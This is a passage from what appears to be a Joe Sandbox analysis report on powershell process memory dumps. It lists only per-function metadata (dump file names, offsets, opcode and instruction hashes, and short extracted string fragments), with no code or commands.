                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7841b726ae8d918dec7743a72476caad021021e458a2478eba3d6b81f13638bc
                                                                                                                                                      • Instruction ID: a5a6ba94545e78ac4176c28a85595b8b3414536dcf0e730a755ab6d37c06e61d
                                                                                                                                                      • Opcode Fuzzy Hash: 7841b726ae8d918dec7743a72476caad021021e458a2478eba3d6b81f13638bc
                                                                                                                                                      • Instruction Fuzzy Hash: 70B1D63060DA4D8FEB68DF28C8657E93BE1FF55310F04426EE85DC7296CA74A945CB82
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.1984202291.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 66d217c49b264d7b0a397f0323c7c6a71e0e6dd2a6358804cc13e7ecc76a746b
                                                                                                                                                      • Instruction ID: a94672d667835c9cbfdf5bf072c384f43d40b421f81ee67d2a86a8fea2362f50
                                                                                                                                                      • Opcode Fuzzy Hash: 66d217c49b264d7b0a397f0323c7c6a71e0e6dd2a6358804cc13e7ecc76a746b
                                                                                                                                                      • Instruction Fuzzy Hash: FF61F961A0EBCD5FD762A7A848A05B47FA0EF56211B0941FFD098C72F3DA189D4AC352
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.1984202291.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c5dca5fb957aa820319f0a9365576d5fc61354d7678cf31c30f386b01a850707
                                                                                                                                                      • Instruction ID: e82db440f6c2865905812a9d6f3eeff8b742af53a1010d5f6d53761e8942caab
                                                                                                                                                      • Opcode Fuzzy Hash: c5dca5fb957aa820319f0a9365576d5fc61354d7678cf31c30f386b01a850707
                                                                                                                                                      • Instruction Fuzzy Hash: 3C31E522F1FB8A1BE7B5A69918B617C7981AF55260B5902FFD45DC72F3DD0A6C004341
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.1984202291.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c399f7981bb9f4e1069e1d7dc07e95b26263273fedf51ca0c4f161ee718e4744
                                                                                                                                                      • Instruction ID: 8f61f2c4cbe1e6d66a51656fe3b210f51bfd3e399dcedaac5e37be3d2d214631
                                                                                                                                                      • Opcode Fuzzy Hash: c399f7981bb9f4e1069e1d7dc07e95b26263273fedf51ca0c4f161ee718e4744
                                                                                                                                                      • Instruction Fuzzy Hash: F0315632B0EB8D1FEBA2EAA848645B47BE0EF55311B0901BED44CD72F3D919AC45C341
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.1984202291.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c672315c03e171b549e4fac9d26898eb2ebdf1b34163cd04fa50a9d4ef855760
                                                                                                                                                      • Instruction ID: cd18cb347f70bc7d3ef5dc2f56936048d089bd052573eaa867a9130caba7eb3f
                                                                                                                                                      • Opcode Fuzzy Hash: c672315c03e171b549e4fac9d26898eb2ebdf1b34163cd04fa50a9d4ef855760
                                                                                                                                                      • Instruction Fuzzy Hash: E621D422B0FB8E1BE3B5AAA904B527875D2DF51310B5A05BED45DC72F2ED19EC018245
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.1983462084.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffd9b6f0000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9613d8ab5e500c28c53dd95f0e14965eb853f9e3eaf5018e14c7db9cab530f54
                                                                                                                                                      • Instruction ID: 7b6f899a7d087d408aa406486413516138cecf502fbf95a5060c7c1f1b9ebe1d
                                                                                                                                                      • Opcode Fuzzy Hash: 9613d8ab5e500c28c53dd95f0e14965eb853f9e3eaf5018e14c7db9cab530f54
                                                                                                                                                      • Instruction Fuzzy Hash: 4731ED30B1A55D8EFBB49F54CC26BF93AA4FF85319F450139D45D8A0A2CA387A85CB11
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.1984202291.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f9b68cbacc275d4b0407aee19c05f02c3949fb2fd72864d0f666139e514149a0
                                                                                                                                                      • Instruction ID: 4485fd799c7e87e71f80ab24c57dcd051f96abb958046470f05a70075db80dc0
                                                                                                                                                      • Opcode Fuzzy Hash: f9b68cbacc275d4b0407aee19c05f02c3949fb2fd72864d0f666139e514149a0
                                                                                                                                                      • Instruction Fuzzy Hash: 5E21E563F0FBCA1FE761A67C08751783A919F56250B1A05FED09DCB1F3D8185D458351
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.1983462084.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffd9b6f0000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                      • Instruction ID: 3a3a501e6df2a9ac9139eb29bbe8fae1f19eb67d5eabdbf52ead55d6b5645ddf
                                                                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                      • Instruction Fuzzy Hash: AE01A73120CB0C4FD748EF0CE051AA5B7E0FB85324F10056DE58AC36A5D732E881CB41
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.1984202291.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 00e7e2d428d207aebabe5d703b1aef120311baa995131450e60f4a2469279648
                                                                                                                                                      • Instruction ID: 22e04f9ce0dcbca3e41576328a4dba4b668e783543855ad9fe71a808c57bf0d3
                                                                                                                                                      • Opcode Fuzzy Hash: 00e7e2d428d207aebabe5d703b1aef120311baa995131450e60f4a2469279648
                                                                                                                                                      • Instruction Fuzzy Hash: CBE0D833B1DB0D1EFB5CAA5C68621F973C1DF81124B45197FD14EC2197D816A8220241
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 327e39dcb622041f413ed29239668d0ac932fc7cb62991d78b7cc76f500d701f
                                                                                                                                                      • Instruction ID: 0071457493eac6a9347c18e2a1ede408df941ca06651fc01765c89f67c9cbcc3
                                                                                                                                                      • Opcode Fuzzy Hash: 327e39dcb622041f413ed29239668d0ac932fc7cb62991d78b7cc76f500d701f
                                                                                                                                                      • Instruction Fuzzy Hash: 83B15E71E002099FDF10EFA8D98579DBBF1AF48318F148A2DDA15E7254EB74A845CF81
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2d2ce0c633213c29ea71a745f45f66860ac09e66ad73a3f7f9ed5294cb71e621
                                                                                                                                                      • Instruction ID: d08df74da3b4815ac61d7d3f08e48d675c4cee341ca3e7ed2958b45748baa6dd
                                                                                                                                                      • Opcode Fuzzy Hash: 2d2ce0c633213c29ea71a745f45f66860ac09e66ad73a3f7f9ed5294cb71e621
                                                                                                                                                      • Instruction Fuzzy Hash: E7B16071E002099FDF10DFA9D98179DBBF2AF48314F148A2DDA15E7254EB74A846CF81
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 59af87eace45064222f3194771a7170e889302b91cb10960758e0b4b23b6e36e
                                                                                                                                                      • Instruction ID: a3eecfc2f03b0c0cae3085ff634891435e189f9c7ac3a031d83c1e5fe10f180f
                                                                                                                                                      • Opcode Fuzzy Hash: 59af87eace45064222f3194771a7170e889302b91cb10960758e0b4b23b6e36e
                                                                                                                                                      • Instruction Fuzzy Hash: DDB16371E00209CFDF10DFA9D98179DBBF2AF48314F148A2DEA15EB254EB74A845CB81
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-81657163
                                                                                                                                                      • Opcode ID: 4a37178e4e20e875193b278d48ffefe450dbd0fe1e84e256219bbe211f78cfec
                                                                                                                                                      • Instruction ID: c9d9282314fc4236faffb64449178e4e38fa4a02d9c359085d5025ea99ca1636
                                                                                                                                                      • Opcode Fuzzy Hash: 4a37178e4e20e875193b278d48ffefe450dbd0fe1e84e256219bbe211f78cfec
                                                                                                                                                      • Instruction Fuzzy Hash: 9C325AB1B043079FCB249B79C4586AABBE2AFC5690F14846AD407CF351DB36DC46C7A2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-3077448208
                                                                                                                                                      • Opcode ID: aa9f794827839ff989639a6e03d6b8dc169497b4488cc41bd25b028aa24d496f
                                                                                                                                                      • Instruction ID: ad93c1c45b618eedfdee97642bc0f6c3b6f6d444efc162b83494c45afbe3fd67
                                                                                                                                                      • Opcode Fuzzy Hash: aa9f794827839ff989639a6e03d6b8dc169497b4488cc41bd25b028aa24d496f
                                                                                                                                                      • Instruction Fuzzy Hash: 8F225AB1B043859FCB258F79C81466ABBF1BF82250F1884ABD456CF356DB35C886C762
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                      • API String ID: 0-2822668367
                                                                                                                                                      • Opcode ID: 9a1c1e6bbb70e8697a70e2657e2a3aa5ae2455ca85ed099aaadb37ed20b15087
                                                                                                                                                      • Instruction ID: 1a223b10ad43eca8b47d603fb5492e005e49ed9946a71b79852a9a76aa05855f
                                                                                                                                                      • Opcode Fuzzy Hash: 9a1c1e6bbb70e8697a70e2657e2a3aa5ae2455ca85ed099aaadb37ed20b15087
                                                                                                                                                      • Instruction Fuzzy Hash: 44D1B1B0A402189FDB24DF68C955B9EBBB2BB84344F1084A9D5096F395CF31ED86CF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                      • API String ID: 0-4202989938
                                                                                                                                                      • Opcode ID: bcdd364c837b0d0f9f3846a618dc71f2893367f182cf92269966ceb674c6d790
                                                                                                                                                      • Instruction ID: 62cab7f6785b8f653a444decba043bf2566408e4c76a6d085e3b9fb757c197f6
                                                                                                                                                      • Opcode Fuzzy Hash: bcdd364c837b0d0f9f3846a618dc71f2893367f182cf92269966ceb674c6d790
                                                                                                                                                      • Instruction Fuzzy Hash: EFA1C0B0B402089FDB14DB68C955B9EBBE3AB89344F24C465D4026F3A5CF75EC86CB91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                      • API String ID: 0-1420252700
                                                                                                                                                      • Opcode ID: f025f0160875ea4c472c2cfc135eeaa43cc9c520b9aac275ab4aa727df460033
                                                                                                                                                      • Instruction ID: f8629cb72ba88b045cf3db7192700304d4cf357b3626f08bdc6949a795d2ad3a
                                                                                                                                                      • Opcode Fuzzy Hash: f025f0160875ea4c472c2cfc135eeaa43cc9c520b9aac275ab4aa727df460033
                                                                                                                                                      • Instruction Fuzzy Hash: 031248B17042059FCB259BBC99117AF7BE2AFC1250F14C4BAD446CB751DB36D882C7A2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Hbq$$^q$$^q
                                                                                                                                                      • API String ID: 0-1611274095
                                                                                                                                                      • Opcode ID: 1faaae1abdc541e433fb45aa2453bb990e1c82972a2fd1c34a224ce1b9e65615
                                                                                                                                                      • Instruction ID: 6240dcb94aeb054ca9d72d4153303e117b3ce64e8d83fe553f65284e4b4a39e7
                                                                                                                                                      • Opcode Fuzzy Hash: 1faaae1abdc541e433fb45aa2453bb990e1c82972a2fd1c34a224ce1b9e65615
                                                                                                                                                      • Instruction Fuzzy Hash: 55127030B002189FDB25EB28C8547AEB7B2AF89704F1045E9D50AEB365DF35AD85CF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$$^q
                                                                                                                                                      • API String ID: 0-953868773
                                                                                                                                                      • Opcode ID: f3b5dc361e3d7a1f609a9c647eb79f10146362282b60e6c644265448f4c4e1ee
                                                                                                                                                      • Instruction ID: f54f0462aee361004b0e35c56e2dcc3979b978a90cdbf5b57ebf963a67336cf5
                                                                                                                                                      • Opcode Fuzzy Hash: f3b5dc361e3d7a1f609a9c647eb79f10146362282b60e6c644265448f4c4e1ee
                                                                                                                                                      • Instruction Fuzzy Hash: 9D919FB07143058FCB15AB78881576A7BE2AF86390F1584AAD513CF3A1DE31EC46C7A2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-831282457
                                                                                                                                                      • Opcode ID: 85d60e3db0bebd6bdfb3ba545c5b8b5cc364dac7f7ec5d5aa47409966e9e12d3
                                                                                                                                                      • Instruction ID: 9b60116f7547aacde444fe388276346e9b3e407c371e6687418fde90ef655191
                                                                                                                                                      • Opcode Fuzzy Hash: 85d60e3db0bebd6bdfb3ba545c5b8b5cc364dac7f7ec5d5aa47409966e9e12d3
                                                                                                                                                      • Instruction Fuzzy Hash: 43412AB2F002169BCB145A79894066EFBE5AFC4654F14852AD806EB345DE32DA05C7F1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q
                                                                                                                                                      • API String ID: 0-2697143702
                                                                                                                                                      • Opcode ID: 60f1b244b5cdb29c2a9309148cbd64edc14e54b12aa20e00d4517c7e30195a4f
                                                                                                                                                      • Instruction ID: 1d8eaefe0c0f6b2b25d282918e0f61bc06a171a0354025ea43585a031710055a
                                                                                                                                                      • Opcode Fuzzy Hash: 60f1b244b5cdb29c2a9309148cbd64edc14e54b12aa20e00d4517c7e30195a4f
                                                                                                                                                      • Instruction Fuzzy Hash: CA9292B4B00618DFDB24DB28C845B59BBB2BF85304F14C1A9D90A6B355CB72EC86CF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q
                                                                                                                                                      • API String ID: 0-2697143702
                                                                                                                                                      • Opcode ID: 8e6ff8497f49de4cc7979d1040aec52340650aab42667aca09506e1a49201583
                                                                                                                                                      • Instruction ID: c8eef26605506134380d086d320085557f9885f567b756deb54e368a927a99c3
                                                                                                                                                      • Opcode Fuzzy Hash: 8e6ff8497f49de4cc7979d1040aec52340650aab42667aca09506e1a49201583
                                                                                                                                                      • Instruction Fuzzy Hash: 5CF1A0B0A402159FDB24DB68CE54F9EBBE2AB84340F1080A5D509AF395CF75ED82CF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $^q$$^q
                                                                                                                                                      • API String ID: 0-355816377
                                                                                                                                                      • Opcode ID: 2b8a0f9bf6e2055de94610f38c24fad1fbadebdf2c2342703bb73ada1830fae4
                                                                                                                                                      • Instruction ID: 733d42b874270c50ce249a3134091bec3f3e8fd827c2d856ca30e069ab4dfde9
                                                                                                                                                      • Opcode Fuzzy Hash: 2b8a0f9bf6e2055de94610f38c24fad1fbadebdf2c2342703bb73ada1830fae4
                                                                                                                                                      • Instruction Fuzzy Hash: 101127F2D0021ADB8F249E7985402B9FBF4BF44A90F694556CC5AEB305D731DA01CBB0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                      • Opcode ID: 7ccffd8de3778978d7914e0c8c56a1698bdc3a2791f51a8efc7d88a710a1665b
                                                                                                                                                      • Instruction ID: 0e746d3d008d2a3306cebcd47d62a9f764d3869f243d096e8cba426b97e8c712
                                                                                                                                                      • Opcode Fuzzy Hash: 7ccffd8de3778978d7914e0c8c56a1698bdc3a2791f51a8efc7d88a710a1665b
                                                                                                                                                      • Instruction Fuzzy Hash: 387272B4B00615DFDB24CB18C841B99BBB2BF85354F14C1A9D90A6B352CB72ED86CF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                      • Opcode ID: e22e6ac67e34c682c5c661f5020f291721e56a5ae38f4887ad9f3f55d75ff5f3
                                                                                                                                                      • Instruction ID: 41eb3de19f1f742b949b269d54271f285892ce67dcfb834e20d72d90fb09c54b
                                                                                                                                                      • Opcode Fuzzy Hash: e22e6ac67e34c682c5c661f5020f291721e56a5ae38f4887ad9f3f55d75ff5f3
                                                                                                                                                      • Instruction Fuzzy Hash: 0B326FB4B00615DFDB24CB18C841B99BBB2BF85354F14C0A9D90A6B356CB72ED86CF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: U
                                                                                                                                                      • API String ID: 0-3372436214
                                                                                                                                                      • Opcode ID: 480aaa7b7aace952a8b4d322d01728eb730f36a3da916cd1937e9c6896ca900d
                                                                                                                                                      • Instruction ID: ced1ad31c07ab4081d3f2be819656bfe2432c5f42f276fa33556268304f92e2a
                                                                                                                                                      • Opcode Fuzzy Hash: 480aaa7b7aace952a8b4d322d01728eb730f36a3da916cd1937e9c6896ca900d
                                                                                                                                                      • Instruction Fuzzy Hash: 70D1F574A00219EFCB04DF98D584A9DBBB2FF88714F258659E805EB365C736ED81CB90
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                      • Opcode ID: c3cf5cb6b7771eb1a4d7d489673ff077e2907f31bdf3801e0d4906c87c35f7bb
                                                                                                                                                      • Instruction ID: cf57b862f3e9ca350f2e8ace4dcc424d4622fe25557d8dbf0b55d2ee66fd9247
                                                                                                                                                      • Opcode Fuzzy Hash: c3cf5cb6b7771eb1a4d7d489673ff077e2907f31bdf3801e0d4906c87c35f7bb
                                                                                                                                                      • Instruction Fuzzy Hash: 505105F0B14306CFCB15EB348544A6A7BE2AB863D4F1580AAD9039B365D732F846C761
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6062d334dd257386d5fcae5919a0328bc6eca05ef060adbd9d085c5d97738e2f
                                                                                                                                                      • Instruction ID: e03063ae3b88c996ed64007c0000f3ef78e3b687583a3f4b22fad51032b99154
                                                                                                                                                      • Opcode Fuzzy Hash: 6062d334dd257386d5fcae5919a0328bc6eca05ef060adbd9d085c5d97738e2f
                                                                                                                                                      • Instruction Fuzzy Hash: AA221774A012099FCB15DF98C584AAEFBB2BF48710F248A59E815AB365C736FC41CB90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ab2a4a9c4716892841f870ba4ceec9ce847b43580f24944e6489d1f695425386
                                                                                                                                                      • Instruction ID: b5dc0ce8949812c07f7c27ec9de3385a0466fc30b3024f207449e080d4eaba43
                                                                                                                                                      • Opcode Fuzzy Hash: ab2a4a9c4716892841f870ba4ceec9ce847b43580f24944e6489d1f695425386
                                                                                                                                                      • Instruction Fuzzy Hash: 12D11675A00219AFCB04DF98C584A9DFBB2FF88720F258659E805EB365D735ED81CB90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
